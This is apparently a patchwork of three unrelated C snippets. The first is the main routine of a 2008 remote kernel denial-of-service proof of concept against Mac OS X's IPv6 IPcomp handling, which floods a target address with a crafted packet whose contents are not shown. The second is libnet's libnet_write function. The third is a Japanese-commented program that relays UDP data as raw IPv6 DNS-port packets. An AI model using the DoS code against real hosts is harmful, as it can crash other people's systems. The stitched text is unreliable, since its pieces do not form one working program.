int
main (int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128];
unsigned int i, ip6_addr[4];
libnet_t *lnsock;
printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]);
exit (EXIT_FAILURE);
}
if (get_localip (IPV6_INTERFACE,
(unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0)
{
fprintf (stderr, "* get_localip() failed\n");
exit (EXIT_FAILURE);
}
if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0)
{
fprintf (stderr, "* inet_pton() failed\n");
exit (EXIT_FAILURE);
}
memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr);
lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf);
if (lnsock == NULL)
{
fprintf (stderr, "* libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}
inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf);
printf ("* local ipv6 %s...\n", ip6_buf);
printf ("* attacking %s...", argv[1]);
for (i = 0; i < HAMMER_NUM; i++)
libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1);
printf ("done\n");
return (EXIT_SUCCESS);
}
int
libnet_write(libnet_t *l)
{
int c;
uint32_t len;
uint8_t *packet = NULL;
if (l == NULL)
{
return (-1);
}
c = libnet_pblock_coalesce(l, &packet, &len);
if (c == - 1)
{
/* err msg set in libnet_pblock_coalesce() */
return (-1);
}
/* assume error */
c = -1;
switch (l->injection_type)
{
case LIBNET_RAW4:
case LIBNET_RAW4_ADV:
if (len > LIBNET_MAX_PACKET)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): packet is too large (%d bytes)\n",
__func__, len);
goto done;
}
c = libnet_write_raw_ipv4(l, packet, len);
break;
case LIBNET_RAW6:
case LIBNET_RAW6_ADV:
c = libnet_write_raw_ipv6(l, packet, len);
break;
case LIBNET_LINK:
case LIBNET_LINK_ADV:
c = libnet_write_link(l, packet, len);
break;
default:
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): unsuported injection type\n", __func__);
goto done;
}
/* do statistics */
if (c == len)
{
l->stats.packets_sent++;
l->stats.bytes_written += c;
}
else
{
l->stats.packet_errors++;
/*
* XXX - we probably should have a way to retrieve the number of
* bytes actually written (since we might have written something).
*/
if (c > 0)
{
l->stats.bytes_written += c;
}
}
done:
/*
* Restore original pointer address so free won't complain about a
* modified chunk pointer.
*/
if (l->aligner > 0)
{
packet = packet - l->aligner;
}
free(packet);
return (c);
}
int main( int argc, char* argv[] )
{
int socket;
unsigned char data[1280];
int size;
libnet_t *libnet_context;
char libnet_errmsg_buf[LIBNET_ERRBUF_SIZE];
//socket = sock_afpacket( argv[1] );
socket = sock_udp( argv[2], strtoul(argv[3], NULL, 10 ) );
if ( socket == -1 )
{
fprintf(stderr, "socket error\n");
return 1;
}
// libnetのコンテキスト作成
libnet_context = libnet_init(LIBNET_RAW6_ADV, NULL, libnet_errmsg_buf );
//libnet_context = libnet_init(LIBNET_RAW6_ADV, argv[1], libnet_errmsg_buf );
if ( NULL == libnet_context )
{
fprintf(stderr, "%s\n", libnet_errmsg_buf );
close(socket);
return 1;
}
for(;;)
{
libnet_ptag_t ptag_udp, ptag_ip6;
uint8_t *pbuf;
uint32_t payload_len;
//afpacketからのデータ受信
//size = recv_packet( socket, sizeof(data), data );
//print_ipv6_header( data );
// UDPデータ受信
size = recv( socket, data, sizeof(data), MSG_TRUNC );
printf("data recieve. ");
dump_packet( size, data );
putc('\n', stdout);
// UDPヘッダ
ptag_udp = libnet_build_udp(
(uint16_t)(random()%(65535-49152)+49152), // source port(49152 - 65535)
53, // destination port
sizeof(header_udp) + size, // length of UDP pakcet
0, // checksum(autofill)
data, // payload
size, // payload length
libnet_context,
0 );
pbuf = libnet_getpbuf( libnet_context, ptag_udp );
payload_len = libnet_getpbuf_size( libnet_context, ptag_udp );
// IPv6ヘッダ
ptag_ip6 = libnet_build_ipv6(
0, // Traffic Class
0, // Flow Label
//sizeof(header_ipv6) + sizeof(header_udp) + size, // total length of the IP packet
sizeof(header_udp) + size, // total length of the IP packet
IPPROTO_UDP, // Next header(UDP)
10, // Hop Limit
libnet_name2addr6(
libnet_context, SRC_IP, LIBNET_DONT_RESOLVE ), // src ip
libnet_name2addr6(
libnet_context, DST_IP, LIBNET_DONT_RESOLVE ), // dst ip
pbuf, // payload
payload_len, // Payload Length
libnet_context,
0 );
// 送信データ取得
pbuf = libnet_getpbuf( libnet_context, ptag_ip6 );
payload_len = libnet_getpbuf_size( libnet_context, ptag_ip6 );
// チェックサム計算←IPv6は未対応の模様
//libnet_do_checksum( libnet_context, pbuf, IPPROTO_UDP, payload_len );
printf("data sending. ");
dump_packet( payload_len, pbuf );
// データ送信
//libnet_write_raw_ipv6( libnet_context, data, size );
libnet_write_raw_ipv6( libnet_context, pbuf, payload_len );
// 作成データ解放
libnet_clear_packet( libnet_context );
}
return 0;
}
